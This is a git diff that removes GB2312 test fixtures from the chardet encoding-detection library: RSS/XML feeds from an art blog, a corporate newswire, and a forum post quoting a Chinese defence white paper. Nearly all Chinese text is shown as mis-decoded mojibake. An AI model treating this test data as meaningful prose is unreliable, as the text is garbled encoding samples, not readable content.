÷ת²»¹י»­ְָ - zh - - hourly - 1 - 2000-01-01T12:00+00:00 - - - - - - - - - - - - ²»¹יֳֶׂסֲ‏»­ֿµֱ׀£÷׳¨ׂµ¹₪׳ק - http://blog.westca.com/blog_ zhalimuto/p_full/51616.html - 2005-12-27T06:52:52Z - ÷ת²»¹י - ­hַעָAˆףֲ‏®‹Bd Cartoon - - - - -

    -

    -

    -

    ]]>
    -
    - - In your eyes(ִדµִֹׁס£© - http://blog.westca.com/blog_ zhalimuto/p_full/51091.html - 2005-12-21T06:35:13Z - ÷ת²»¹י - 2d Digital painting - It's not the first time that my audiences told me that they like the eyes of the characters in my paintings, -it looks like they are telling the story of the characters, of their soul world, -yes, that's sth i am always trying to catch in my painting, -I should admit i am an eyes-fetish, hahah :>> - It's not the first time that my audiences told me that they like the eyes of the characters in my paintings,

    -

    it looks like they are telling the story of the characters, of their soul world,

    -

    yes, that's sth i am always trying to catch in my painting,

    -

    I should admit i am an eyes-fetish, hahah :>>

    ]]>
    -
    - - Portrait of a man - http://blog.westca.com/blog_ zhalimuto/p_full/50833.html - 2005-12-19T08:14:55Z - ÷ת²»¹י - 2d Digital painting - Another portrait for my coworker, referenced from Sargent's style. - - Another portrait for my coworker, referenced from Sargent's style.

    -

    ]]>
    -
    - - ²»¹יֳֶׂסֲ‏»­ֿµֱ׀£÷·´¿¹־ְם - http://blog.westca.com/blog_ zhalimuto/p_full/50832.html - 2005-12-19T08:09:58Z - ÷ת²»¹י - ­hַעָAˆףֲ‏®‹Bd Cartoon - - - -  - -

    -

    -

    -

     

    -

    ]]>
    -
    -
    diff --git a/chardet/tests/GB2312/acnnewswire.net.xml b/chardet/tests/GB2312/acnnewswire.net.xml deleted file mode 100644 index 613ef6e..0000000 --- a/chardet/tests/GB2312/acnnewswire.net.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -Asia Corporate Press via ACNNewswire.nethttp://home.acnnewswire.netAsia Corporate News Network Pressen-usCopyright 2005, ACN Newswirecorp@asiacorpnet.comtim.mckinnon@asiacorpnet.comSat, 31 Dec 2005 06:15:55+0900Sat, 31 Dec 2005 06:15:55+0900Asia Corporate News Networkhttp://www.asiacorpnet.com/images/acnlogo.jpghttp://home.acnnewswire.net6019Asia Corporate News NetworkJCB ׃כײ׀¹תׂרֱ×£¨China UnionPay£©ֽך³ֹATMֽר¹״׀­ׂיµִַ©¶©£»CUP³ײ¿¨ױµֳׂװµׂ»´־װָױ±¾ֿם¹׃ֳATMֽרֲחµִָ¨ְhttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29698lui@japancorp.net (Chris Lui)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29698Tue, 27 Dec 2005 13:08:54+0900ַׁײ¿×·¢ׂר׀׀׀ֲ־ֵ¸וַׁ׀׀´¿מֱ¦ֶֽײ׀¹ת÷׃ִֿ¡÷£÷׃ֱק׃ע»·¾³־ָ¾ײ־ְםhttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29697tim.mckinnon@japancorp.net (??? ?????)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29697Wed, 21 Dec 2005 15:06:24+0900ַׁײ¿×·¢ׂר׀׀׀ֲ־ֵ¸וַׁ׀׀¼´½«ֶֽ³צ׀ֲµִּ¼ָ׳¹₪¾£¬ְ©´ףַו½א·¢ױ¹»תײֶֿמִ¿µִ¹©׃¦http://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29696tim.mckinnon@japancorp.net (??? ?????)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29696Wed, 21 Dec 2005 14:53:55+0900°ִ´ףְַׁSAI GLOBALְ´·ֳhttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29693porter@japancorp.net (Mayumi Saito)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29693Fri, 2 Dec 2005 00:34:16+0900NTT DoCoMo¼ֶ»®׳¢׳Aplixhttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29692tim.mckinnon@japancorp.net (??? ?????)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29692Thu, 1 Dec 2005 13:07:27+0900NTT DoCoMoװACCESSװצ³ײ¹ֹ·http://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29691tim.mckinnon@japancorp.net (??? ?????)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29691Thu, 1 Dec 2005 10:10:36+0900°¢ֲָו׀²¼ּבׂיױ¹÷¶א·¨ֻ¹¿ֶhttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29690porter@japancorp.net (Bruce Porter)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29690Wed, 23 Nov 2005 14:32:13+0900Wavecom׀¯ײDatecs£¬¹²ֽ¬½«ױׂר»תֱ¬½׃ײֱָ¶־¬ַׁ²ֶױ‏²¿http://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29689porter@japancorp.net (Bruce Porter)Asia Corporate News Press Releaseshttp://www.acnnewswire.net/Article.Asp?lang=_c&Art_ID=29689Tue, 22 Nov 2005 14:59:44+0900 \ No newline at end of file diff --git a/chardet/tests/GB2312/bbs.blogsome.com.xml b/chardet/tests/GB2312/bbs.blogsome.com.xml deleted file mode 100644 index 8c1832e..0000000 --- a/chardet/tests/GB2312/bbs.blogsome.com.xml +++ /dev/null @@ -1,205 +0,0 @@ - - - - - Let's talk.Let's think. - http://bbs.blogsome.com - Just another WordPress weblog - Mon, 27 Dec 2004 11:12:20 +0000 - http://backend.userland.com/rss092 - - - - »מ¸ֲֳףµ±ְֽ - -»מ¸ֳ£¬ׂ×ַ־ֱׂ¬ִדµִ·‏־סֶק¶¼ֵ×¶ֲּ· - - - http://bbs.blogsome.com/2004/12/27/iaaouai/ - - - ¡°ױף·ח¡±ױ½¶·»ת(׳יֽ¼) - - - - - - http://bbs.blogsome.com/2004/12/27/oocouei/ - - - ײ׀¹ת¿ױ¾SU-27ױ½»ת - - ¹ת¼ַׂ¿´ףֱֻ£¬־ֳַׂ²ֵֻ¯µֳ°²־ָ¡£ֿ£ֽׂװ÷ף׳װ¼÷ִװל±ָױגָֿ½רµִ¶אµִ·ֹ»ת¡£ - - - http://bbs.blogsome.com/2004/12/27/odhuousu-27ou/ - - - ײ׀¹ת·¢±ם¡¶£²£°£°£´ִךײ׀¹תµִ¹ת·ְ¡·°׳ֶ₪י - ׀ֲ»×ֽר±±¾©£±£²װֲ£²£·ָױµח£¨¼ַױײ׀§ױ‏£©¹ת־סװ÷׀ֲ־ֵ°ל¹«ׂ£²£·ָױ·¢±ם¡¶£²£°£°£´ִךײ׀¹תµִ¹ת·ְ¡·°׳ֶ₪י£¬ָ«ֳז½יֹײ׀¹תµִ¹ת·ְױ‏²ׂװ¼°½ֱ½ִךְ´¹ת·ְ÷ֽ¾¶׃½¨ֹטµִ·¢ױ¹¡£ - ¡¡¡¡ױגַײ׀¹ת׳װ£±£¹£¹£µִךׂװְ´µ£µ´־·¢±ם¹ת·ְ°׳ֶ₪י¡£°׳ֶ₪יָ«־ִװ¼£³ֽע׳ײ£¬°÷¬°²ָ«׀־ֶ£¬¹ת·ְױ‏²£¬ײ׀¹תּ״ֹ«¾ֲ±ה¸ן£¬¹ת·ְ¾­·ׁ÷ֽ¹ת·ְ׳²ת£¬±רׂײֶ¶ָ£¬¹ת·ְ¶¯װ±÷ֽ÷ף±¸ֱ¦ֱ¿½¨ֹט£¬¹ת·ְ¿ֶ¼¼¹₪ׂµ£¬¾¶׃׃כֳָֻס£¬¹ת¼°²ָ«÷ֿ׳ק£¬¾¿״¡¢²ֳ¾׃כ·ְְ©ֹ¢µָ£±£°¸צ²¿·ײ¡£ - ¡¡¡¡°׳ֶ₪יײ¸³צ£¬ײ׀¹תװ±¾ְ¼ֽֽ·¶‏®ִךµִ·¢ױ¹ִ¿±ךַ¼¯ײ׀ֱ¦ֱ¿ָ«ֳז½¨ֹט׀¡¿µֹח»ב¡£ײ׀¹ת·¢ױ¹µִ»שµדײקׂ×·ֵװְׂ¿¿׳װ¼÷µֱִ¦ֱ¿ֹֿ£¬²»»ב·ֱ°­÷ֽֽ‏׀²ָ־÷־ָֻ¡£ײ׀¹ת׀טׂ×ׂ»¸צ÷ֶֽ½µִ¹ת¼»·¾³ְ´·¢ױ¹׳װ¼÷£¬׃ײֵ¬ֱ¦ׂװ׳װֹםµִ·¢ױ¹´½רְ½חµִ÷ֶֽ½׃כ·¢ױ¹¡£ײ׀¹ת¼ב³ײ¸¾÷ֶֽ½¡¢·¢ױ¹¡¢÷ֿ׳קµִֶלײִ£¬¼ב³ײ¶ְֱ¢׳װײקµִ÷ֶֽ½ֽג½»ױ‏²£¬¼ב³ײ·ְ׃ש׀װµִ¹ת·ְױ‏²£¬׃ְװ¶²»¸דְ©ױֵ£¬׃ְװ¶²»³ֶ°װ¡£ - ¡¡¡¡°׳ֶ₪יֻµ£¬¼ב³ײ¹ת·ְ½¨ֹט׃כ¾­¼ֳ½¨ֹט׀­µק·¢ױ¹£¬½¨ֹטׂ»ײ§ֿײ´ת»¯¡¢ױ‎¹ז»¯µִ¸ןֳ¾¶׃£¬ָ·±£¹ת·ְ°²ָ«£¬ַײ׀¹ת¹²²תµ³ײ´ױ‏µִׂ»ֿמײ״´ףױ½ֲװָ־־ס¡£׀ְֲ¼ֽ׀ֲ½׳¶־£¬ײ׀¹ת¹ת·ְ÷ֽ¾¶׃½¨ֹט¼ב³ײׂװµֻ׀¡ֶ½ְםֲ÷ֽ¡°ָ‎¸צ´ת±ם¡±ײ״ׂ×ֻ¼ֿכ־×ײ¸µ¼£¬ָ«ֳז¹ב³¹½­װףֳס¹ת·ְ÷ֽ¾¶׃½¨ֹטֻ¼ֿכ£¬¼ב³ײµ³¶װ¾¶׃¾ר¶װֱלµ¼µִ¸ש±¾װ­װע÷ֽײֶ¶ָ£¬¼ב³ײׂװ׀ֲ±ֶ¾ֲױ½ֲװ·½ױכ־×ֽ³ְ¿£¬»‎¼«ֶֽ½ר¹ת·ְ÷ֽ¾¶׃ֿײ´ת»¯½ר³ּ¡£°׳ֶ₪יָֿ־×£¬÷ֶֽ½׃כ·¢ױ¹ְָׂ»ַµ±½ס±´תµִײקּג£¬¹ת¼׀־ֶ·¢ױ¹µִ»ש±¾ּ¬ֶ±£³ײ׳ּו־ָ¶¨£¬µ«²»ָ·¶¨¡¢²»־ָ¶¨¡¢²»°²ָ«ׂעֻ״׃׀ֻשװצ¼׃¡£¾ֲׂעֻ״¶װ¹ת¼¸ס¾ײ÷ֽ¹ת¼ׂ°²ָ«µִ׃°ֿלֹֹֿ‎£»´«ֽ³÷ֽ·ַ´«ֽ³°²ָ«־ּג½»ײ¯£¬·ַ´«ֽ³°²ָ«ֽ‏׀²ָױׂזֿׁײ״£»²תֹת¿ײ²ְײקׂוµִ¸שװ´ִׁׂװ´׃¸ש±¾ֹֿֿ³‎£¬·´¶װ¿ײ²ְײקׂו½«ַ¹ת¼ֹח»בµִׂ»ֿמ³₪ֶ¼ט¾µִָ־־ס¡£ַּׁ«µ״ַר°²ָ«׀־ֶ»ש±¾־ָ¶¨£¬µ«ַּׁ«µ״ַר°²ָ«׀־ֶײ׀µִ¸´װ׃ׂעֻ״ׂ²װװצ¼׃¡£ - ¡¡¡¡°׳ֶ₪יײ¸³צ£¬µ±ַ°ּ¨ֽו÷£ֿ¿ֱ½°¶¹״ֿµ׀־ֶֿׁ¾‏¡£¡°ּ¨¶ְ¡±·ײֱׁ»מ¶¯ָױׂז³ֹ־×ֶֶ»µײ׀¹תײקָ¨÷ֱֽלֱֽֽךױ£¬־£÷¦ּ¨÷£ֱ½°¶¼°ַּׁ«µ״ַר÷ֶֽ½׃כ־ָ¶¨µִ׳מ´ףֿײµֽ‏׀²¡£ְֳ¹ת¼ּ׀רּבֹ‎ּ¨־הֶקµִ‎ֱ¿÷ֽײֱ¿£¬ֿעּ¨ֽוµ±¾ײ·¢³צ´ם־ף׀ֵ÷ֵ£¬²»ְ׃ּ¨÷£¾ײֶµִ־ָ¶¨¡£ - ¡¡¡¡°׳ֶ₪יײ״ֹך£¬ײ׀¹ת½«¼ב³ײ׳÷ֶֽ½·¢ױ¹µִµְֲ·£¬¼ב¶¨²»ֶׂµ״·מ׀׀·ְ׃ש׀װµִ¹ת·ְױ‏²£¬²¢ײ¸³צֱֻײ׀¹ת־¬»₪¹ת¼ׂ°²ָ«µִ»ש±¾ִ¿±ך÷ָֽ־־ס£¬¼´ײֶײ¹·ײֱׁ£¬´½רֽ³ׂ»£¬·ְ±¸÷ֽµײ¿¹ַײֲװ£¬÷´־ְ¹ת¼ׂײקָ¨¡¢ֱלֱֽֽךױ÷ֽ÷£ׁףָ¨ׂז£»־¬»₪¹ת¼ׂ·¢ױ¹ְׂז£¬´½ר¾­¼ֳֹח»בָ«ֳז¡¢׀­µק¡¢¿ֹ³ײ׀ר·¢ױ¹£¬²»¶ֿװצַ¿׳÷ֿ¹תֱ¦£»¼ב³ײ¹ת·ְ½¨ֹט׃כ¾­¼ֳ½¨ֹט׀­µק·¢ױ¹µִ·½ױכ£¬½¨ֱ¢·÷ֿײ׀¹ת¹תַי÷ֽ׃¦ְ½ח¾ֲ·¢ױ¹ַקֶµִֿײ´ת»¯¹ת·ְ£¬ּב¸׀ֵֿ¢»¯ּץ¼‏ֲֿµִ·ְ־ְ׳קױ½ֱִ¦£»±£ױֳָֻֿסָ÷ײµִױ‏ײ־¡¢¾­¼ֳ¡¢־ִ»¯ָ¨ׂז£¬ְֿׁק´ע»ק¸קײײ·¸׳ן»מ¶¯£¬±£³ײױ‎³£ֹח»בײָ׀ע÷ֹֽח»ב־ָ¶¨£»·מ׀׀¶ְֱ¢׳װײקµִ÷ֶֽ½ֽג½»ױ‏²£¬¼ב³ײ»¥׀ֵ¡¢»¥ְ¡¢ֶ½µָ¡¢׀­׳קµִ׀ֲ°²ָ«¹£¬ױשָ¡½ֿ³₪±ֶµֱִ¼÷ֳ¹ת¼»·¾³÷ֽײ±»·¾³¡£ - ¡¡¡¡°׳ֶ₪יַ¿µק£¬ײֶײ¹¡°ּ¨¶ְ¡±ֱֶ¦·ײֱׁ¹ת¼ׂ£¬ַײ׀¹ת־ה׳°ֱ¦ֱ¿µִֹס¥ײ°װנ¡£ײ׀¹תױ‏¸®¼ּ׀ר¼ב³ײ¡°÷ֶֽ½ֽ³ׂ»¡¢ׂ»¹תֱ½ײֶ¡±µִ»ש±¾·½ױכ÷ֽֿײ½׳¶־·¢ױ¹ֱ½°¶¹״ֿµ¡¢ֶֽ½ר׳ז¹ת÷ֶֽ½ֽ³ׂ»½ר³ּµִ°ֻֿמײקױֵ¡£ײ»ׂ×ּ¨ֽוµ±¾ײ½׃ׂ»¸צײ׀¹תװ­װע¡¢ֽ£ײ¹¡°ּ¨¶ְ¡±·ײֱׁ»מ¶¯£¬ֱ½°¶ֻ«·½ֻז±¿ֹׂװ¾ֽױ‎½½ברµ׀¶װ׳´ּ¬£¬°ְ¨½¨ֱ¢¾ֲ»¥׀ֵ»תײֶ½ר׀׀ּ¸ֵ׀¡£ - ¡¡¡¡°׳ֶ₪יֻµ£¬ײ׀¹תֳָֻס¼ב¾צ·´¶װָ־÷־׀־½µִ¡°ּ¨¶ְ¡±·ײֱׁ»מ¶¯£¬¼ב¾צ·´¶װָ־÷־׀־½µִֽגְ´¸ֹֹז£¬¼ב¾צ·´¶װָ־÷־¹ת¼ֿׂעּ¨ֽו³צ־הֶק»ע׃כּ¨ֽו½ר׀׀ָ־÷־׀־½µִ¾ֲ½בֳֻ£¬¾צ²»װ׀םָ־÷־ָֻׂװָ־÷־·½½°ּׁ¨ֽו´׃ײ׀¹ת·ײ¸מ³צָ¥¡£ָח¹ּ¨ֽוµ±¾ײמת¶ר׳ֿױ£¬µ¨¸ׂײֶװלײ״´ף¡°ּ¨¶ְ¡±ֲ±ה£¬ײ׀¹תֳָֻס÷ֽ־ה׳°ֱ¦ֱ¿½«²»ֿ§ׂ»ַ׀´ת¼£¬¼ב¾צ³¹µ׳µ״·ֻי¡°ּ¨¶ְ¡±·ײֱֽׁ¼ִ±¡£ - ¡¡¡¡°׳ֶ₪יֿךֿ¸½יֱֳָֹֻֻס½ג·ֵ¾»‎¼«ֶֽ½רײ׀¹תּ״ֹ«¾ֲ±ה¸ןµִַי¿צ¡£°׳ֶ₪יײ¸³צ£¬¶‏®ְ¼ֽ°ֻ®ִך´תײ׀ֶׂװְ´£¬ײ׀¹תׁׂ¾­ֽך³ֱֹ½´־´ף¹זִ£²ֳ¾£¬¹²²ֳ¼ץ¾¶׃װ±¶מ£±£µ£°ֽע¡££²£°£°£³ִך£¹װֲ£¬ײ׀¹תױ‏¸®¾צ¶¨£¬£²£°£°£µִךַ°װ²ֳ¼ץ¾¶׃װ±¶מ£²£°ֽע£¬¾¶׃׳¹זִ£½«±£³ײ£²£³£°ֽעָֻ¡£ֳָֻס½ג·ֵ¾װ¼ּ׀רײ״׃ֲ½¾½¨ֹטµִֽ¬±£¬¼׃ַ¿÷£¾¡¢¿ױ¾÷ֽµ¶‏ֵ±ר½¨ֹט£¬ּב¸¶בָ¡ײֶ÷£ָ¨¡¢ײֶ¿ױָ¨ׂװ¼°ױ½ֲװ·´»קֱִ¦£¬²¢°ׁ׀ֵֿ¢»¯׳ק־×ֿײ´ת»¯½¨ֹטµִ·¢ױ¹·½ֿע÷ֽױ½ֲװײ״µד¡£ֳָֻס½ג·ֵ¾»¹װ¼׃¿ל־הֶק׳°±¸ֿײ´ת»¯¡¢µ©ָֻ²ֵױ½ֲװ¹₪³ּ¡¢¼׃ַ¿ֱ×÷ֿׁµֱ·¡¢ֹמ»¯÷ףַ¸ִ¸ן¡¢´´׀ֲױ‏ײ־¹₪׳ק÷ְֽׂ·¨´׃ֿׁײ־¾µָ·½ֳזָ¡µֳֿװײר½רױ¹¡£ - ¡¡¡¡¹״׃ײ׀¹תµִ¹ת·ְ¾­·ׁ־ּג£¬°׳ֶ₪י½יֹֻµ£¬ײ׀¹תױ‏¸®ְׂ¾¹ת·ְ·¨£¬¹ב³¹¹ת·ְ½¨ֹט׃כ¾­¼ֳ½¨ֹט׀­µק·¢ױ¹µִ·½ױכ£¬׃¦¹ת·ְ׀טַףµִ±ה»¯£¬װ¹ת¼ׂ¾­¼ֳ·¢ױ¹÷ֽ²ֶױ‏ױָכװצ³₪µִ»ש´¡ֹֿ£¬¼ּ׀ר¶ָװצ¼׃¹ת·ְ·ׁ¡££²£°£°£²ִך¡¢£²£°£°£³ִךײ׀¹ת¹תִֹת²ת׳ײµ£¨£ַ£ִ£׀£©·ײ±נ־×£±£°£µ£±£·£²£®£³£´¡¢£±£±£·£²£µ£±£®£¹£´ׂװ×ֳָֻס±ׂ¡££²£°£°£²ִך¡¢£²£°£°£³ִךײ׀¹תִך¶ָ¹ת·ְ·ׁ·ײ±נ־×£±£·£°£·£®£·£¸¡¢£±£¹£°£·£®£¸£·ׂװ×ֳָֻס±ׂ£¬£²£°£°£´ִךײ׀¹תִך¶ָ¹ת·ְ·ׁװ₪ֻד־×£²£±£±£·£®£°£±ׂװ×ֳָֻס±ׂ¡£ - ¡¡¡¡°׳ֶ₪יײ¸³צ£¬ײ׀¹תװצ¼׃µִ¹ת·ְ·ׁ£¬ײקׂ×׃ֳ׃ּב¸¾¶׃ָֻװ±¹₪׳´‎׃צ¡¢½רׂ»²½ֽךֶֹ¾ָֹֻח»ב±£ֿױײֶ¶ָ¡¢±£ױֿ¾¶׃ּוײֶ±אײֶµקױ¸ִ¸ן¡¢¼׃´ף¾¶׃ָֻ²ֵ½¨ֹטֽ¶ָכ÷ֽ¶ָװצ¼׃׳°±¸¾­·ׁµָ·½ֳז¡£ - ¡¡¡¡½ֱ½ִךְ´£¬ײ׀¹תִך¶ָ¹ת·ְ·ׁױ¼ֽ¬ֶ¹תִֹת²ת׳ײµ÷ֽ¹ת¼ׂ²ֶױ‏ײ§³צµִ±ְָ‎»ש±¾³ײֶ½¡£¶‏®ְ¼ֽ¾ֵ®ִך´תׂװְ´µִ¾ר´ף¶א‎ִך·£¬ײ׀¹ת¹ת·ְ·ׁµִװצ³₪ֲµֽ׃¹ת¼ׂ²ֶױ‏ײ§³צµִװצ³₪ֲ¡£ײ׀¹ת¹ת·ְ·ׁµִ¾ר¶װ¶מ³₪ֶµֽ׃ׂ»׀©־ק·½´ף¹ת£¬ױ¼¹תִֹת²ת׳ײµ÷ֽ¹ת¼ׂ²ֶױ‏ײ§³צµִ±ָײ״ׂ²ֿא¶װ½ֿµֽ¡££²£°£°£³ִך£¬ײ׀¹ת¹ת·ְ·ׁ½צֿאµ±׃ְֳ¹תµִ£µ£®£¶£¹£¥¡¢ָױ±¾µִ£µ£¶£®£·£¸£¥¡¢׃¢¹תµִ£³£·£®£°£·£¥¡¢·¨¹תµִ£·£µ£®£¹£´£¥¡£°׳ֶ₪יָ«ֳז½יֱֹֻײ׀¹תµ׀׀µִׂו־ס±ר׃כײ¾װ¸±רֿא½ב÷ֿ¡¢ֳס±ר׃כװ₪±¸ֿׂא½ב÷ֿµִ±רׂײֶ¶ָ£¬ׂװ¼°ײ׀¹ת¼ב³ײָ«ֳס°ל¹ת·ְ£¬׳ֵׁ׃·¢»׃ֿײ´תֳָֻסױ½ױשױּו׃ֵֶ£¬¼׃ַ¿ׂװ׳÷ֿ¹תֱ¦־×»ש´¡µִ¹ת·ְ¶¯װ±÷ֽ÷ף±¸ֱ¦ֱ¿½¨ֹטµִ׃׀¹״ַי¿צ¡£°׳ֶ₪יײ¸³צ£¬ײ׀¹ת¹ת·ְ¿ֶ¼¼¹₪ׂµµִײקׂ×ײ°װנַ±£ױֿ¾ֲ׳°±¸µִֹת²ת¹©׃¦£¬ֲת׳ד¹ת·ְ׀טׂס£ֽ¬±£¬»¹³׀µ£ֶֽ¶¯¹תֳס¾­¼ֳ·¢ױ¹÷ּֽבֹ‎׳÷ֿ¹תֱ¦µִײ״ׂ×ָ־־ס¡£¹ת·ְ¿ֶ¼¼¹₪ׂµװָ·±£ֽך³ֹ¾ֲ¶©»ץָ־־סµִֽ¬±£¬´ףֱ¦·¢ױ¹¾ֳסֱ½׃ֳ¼¼ץ£¬»‎¼«²־׃כ¹תֳס¾­¼ֳ½¨ֹט¡£´½ר÷ִֻ¼°÷ֻ׃¦׃ֳ¼¼ץ¡¢ֳס׃ֳ÷½ּל¡¢ֳס׃ֳ÷½¿ױ¡¢ֳס׃ֳ´¬²°¡¢ֳס׃ֳ±¬ֶֶµָ¾¹₪ײקµ¼ֳסֶ·µִ·¢ױ¹׃כ¼¼ץ½ר²½¡£ײ§³ײ־ק²¿´ף¿×·¢¡¢¶«±±ְֿ¹₪ׂµ»שµ״¸ִװל£¬³׀µ£¹ת¼ׂײ״µד¹₪³ּ½¨ֹטֿמִ¿¡¢ײ״´ףֹט±¸ׁ׀ײֶ÷ֽ¼¼ץ¹¥¹״ָ־־ס£¬´½ר¹תֳס¾­¼ֳ²תׂµֹ‎¼¶÷ֽ¼¼ץ½ר²½¡£ - ¡¡¡¡°׳ֶ₪יֻµ£¬ֱ½ִךְ´ײ׀¹תױ‏¸®»‎¼«ֶֽ½ר÷ֶֽ½ְ׃ֳ¾¹₪¼¼ץ·¢ױ¹ֳס׃ֳ²תׂµ£¬²¢ָ¡µֳֿװײר³ֹ׀§¡£ּ״±נֳַס׃ֳ÷½ּלָ¡µֳײ״´ףֽ»ֶֶ¡££±£¹£¹£¶ִך£±£°װֲׂװְ´£¬£´£±´־÷½ּל·¢ֹה¾ש»ס³ֹ¹¦¡££²£°£°£³ִך£±£°װֲ³ֹ¹¦·¢ֹהֹסײ־ו÷ֵװ״ָֻ·ֹ´¬£¬½«ײ׀¹ת׳ֳ÷½ּלװ±ָֻֽכּ«¿ױ¡££²£°£°£´ִך£±װֲױ‎½ֶפ¶¯װֲַעּ½²ג¹₪³ּ£¬¼ֶ»®£²£°£°£·ִךµ׳ַ°µ©ֶָװֲּ½²ג¡£װּ¸µ½ײ׀¹ת¾¶׃׃כֳָֻסµִ¹״ֿµ±£¬°׳ֶ₪יײ¸³צ£¬ײ׀¹תµִ¹ת·ְֳַָֻסµִ¹ת·ְ£¬ײ׀¹ת־ה׳°ֱ¦ֱ¿פ׃ֳָֻס¡£²־¼׃¹ת¼ׂ½¨ֹטֲׂµ£¬ֵ¬ֱ¦־×ֳָֻס·‏־ס£¬ַײ׀¹ת־ה׳°ֱ¦ֱ¿µִײ״ׂ×ײ°װנ¡£¼׃ַ¿¾ױ‏¾ֳסֵֽ½ב£¬ְַׂ¿¿ֳָֻס½¨ֹט¹ת·ְ÷ֽ¾¶׃µִײ״ׂ×ױ‏ײ־»ש´¡¡£ - ¡¡¡¡°׳ֶ₪יֻµ£¬ײ׀¹תׂ»ײ±ײֱֲ¦׃ֶֽ¶¯¸קײײ׀־½µִ¹ת¼°²ָ«¶װ»°׃כ÷ֿ׳ק¡£½ִךְ´£¬ײ׀¹ת¼׃ַ¿ֽ¬׃׀¹״¹ת¼ׂװ°²ָ«׃כ·ְ־סֱל׃עµִֻ«±¼°¶א±ױ½ֲװ´טֹּ÷ֽ¶װ»°£¬´½רֱֻֿא»¥׀ֵָ־¡¢½»ֱק׃כ׀­׳ק£»¼ב³ײ׃כֱ־×ֶֹ¡¢ׂװֱ־×°י£¬·מ׀׀ְֱִ¡¢°²ֱ¡¢¸»ֱµִײ±ֽג½»ױ‏²£¬»‎¼«ֶֽ¶¯ַּׁ«µ״ַר°²ָ«¶װ»°÷ֿ׳ק»תײֶµִ½¨ֹט£»¸¶ָײ״׃׃כ¸ק¹תװ·ַ´«ֽ³°²ָ«ֱל׃עµִ÷ֿ׳ק£¬¼ּ׀ר¼׃´ף²־׃כ¹ת¼·´¿ײ÷ֿ׳קֱ¦¶ָ¡£ - ¡¡¡¡°׳ֶ₪יײ¸³צ£¬ײ׀¹תׂ»¹בײ§³ײ²¢»‎¼«²־׃כ·÷ֿ¡¶ֱ×÷ֿ¹תֿױֲ¡·¾«ֹסµִ־¬÷ֽ׀׀¶¯¡£ײ׀¹ת׳װ£±£¹£¹£°ִך׳´־ֿעֱ×÷ֿ¹ת־¬÷ֽ׀׀¶¯ֵַֹ²¾ֲ¹²לװ±ׂװְ´£¬ָֿׁׂ÷ףֿע£±£³ֿמֱ×÷ֿ¹ת־¬÷ֽ׀׀¶¯ֵֹ³צ־¬÷ֽ¾ֲָֻװ±£³£³£¶£²ָֻ´־¡£װ¹‎ָ¥®ִִֻךײ׀£¬ײ׀¹תָֿ÷ף׃׀£¶ֳ־¬÷ֽ¾ֲָֻװ±װײ´׀׀ָ־־סײ׀־‏ֹ£¬‎®ָֻ¸÷ֹֻ¡£ִ¿ַ°£¬ײ׀¹ת׃׀£¸£´£µֳ־¬÷ֽ¾ֲָֻװ±װֱ×÷ֿ¹ת£¸¸צָ־־סַרײ´׀׀־¬÷ָֽ־־ס¡£ - ¡¡¡¡´ֻֽג£¬ֳָֻס½ג·ֵ¾»‎¼«¿×ױ¹¶װֽג¾ֲ½»ֱק׃כ÷ֿ׳ק£¬׀־³ֱָֹֻ«·½־»¡¢¿םֱל׃ע¡¢¶א²ד´־µִ¾ֲֽג½»¾ײֳז¡£ײ׀¹תׁׂ׃כ£±£µ£°¶א¸צ¹ת¼ׂ½¨ֱ¢¾ֲ¹״ֿµ£¬װ£±£°£°¶א¸צ׳₪ֽג¹¹ֹטֱ¢־ה¹´¦£¬׃׀£¸£µ¸צ¹ת¼ׂװײ׀¹תֹטֱ¢־ה¹´¦¡£ֱ½ִךְ´£¬ֳָֻס½ג·ֵ¾¸¼¶¾ֲ´ת±םֵֽ³צ·ֳ£¶£°¶א¸צ¹ת¼ׂ£¬׃׀£·£°¶א¸צ¹ת¼ׂ£±£³£°׃אֵת¾¶׃ֱלµ¼ְָֻ´·ֳ¡£ - ¡¡¡¡װ¾¿״¡¢²ֳ¾׃כ·ְְ©ֹ¢־ּגֹֿ£¬°׳ֶ₪יײ״ֹךֱֻײ׀¹תױ‏¸®µִׂ»¹בײקױֵ£¬¼´¹ת¼ֹח»ב׃¦־¬»₪¹ת¼¾¿״¡¢²ֳ¾׃כ·ְְ©ֹ¢ּץװ¼ּוֿµ£¬´½רֶהֶױ±י׀װ£¬¼׃ַ¿ֶה׃׀׀§׀װ÷ָֽ¨ֽ‏׀װ£»¼ב³ײ¶א±ײקׂו£¬·¢»׃¶א±¾¿״¡¢²ֳ¾÷ֽ·ְְ©ֹ¢ּץװ¼»ת¹¹µִ׳ק׃ֳ÷ֽ׃°ֿל£»װֿײ׃׀¹ת¼·¨»ש´¡ֹֿ£¬ֵ¬ֱ¦ֽ¨¹‎ױ‏ײ־¡¢ֽג½»ײ¶־׃¦¶װ´ף¹זִ£ֹ±ֹֻ׀װ־הֶקְ©ֹ¢´רְ´µִּפױ½£»²ָֹ¡±ך±¾¼זײ־£¬׳÷ֿײ־ְםµִ·½·¨£¬¼ָׂ×¹״׳¢´ף¹זִ£ֹ±ֹֻ׀װ־הֶקְ©ֹ¢µָ°²ָ«ֽ‏׀²£¬׃ײ²»÷צ׃²תֹתױג׀©־ּגµִֹח»ב÷ֽ¾­¼ֳ¸שװ´¡£°׳ֶ₪יײ¸³צ£¬ײ׀¹תײ״׃·ְְ©ֹ¢־ּג£¬·מ׀׀²»ײ§³ײ¡¢²»¹ְִר¡¢²»°ןײת±נ¹ת·¢ױ¹´ף¹זִ£ֹ±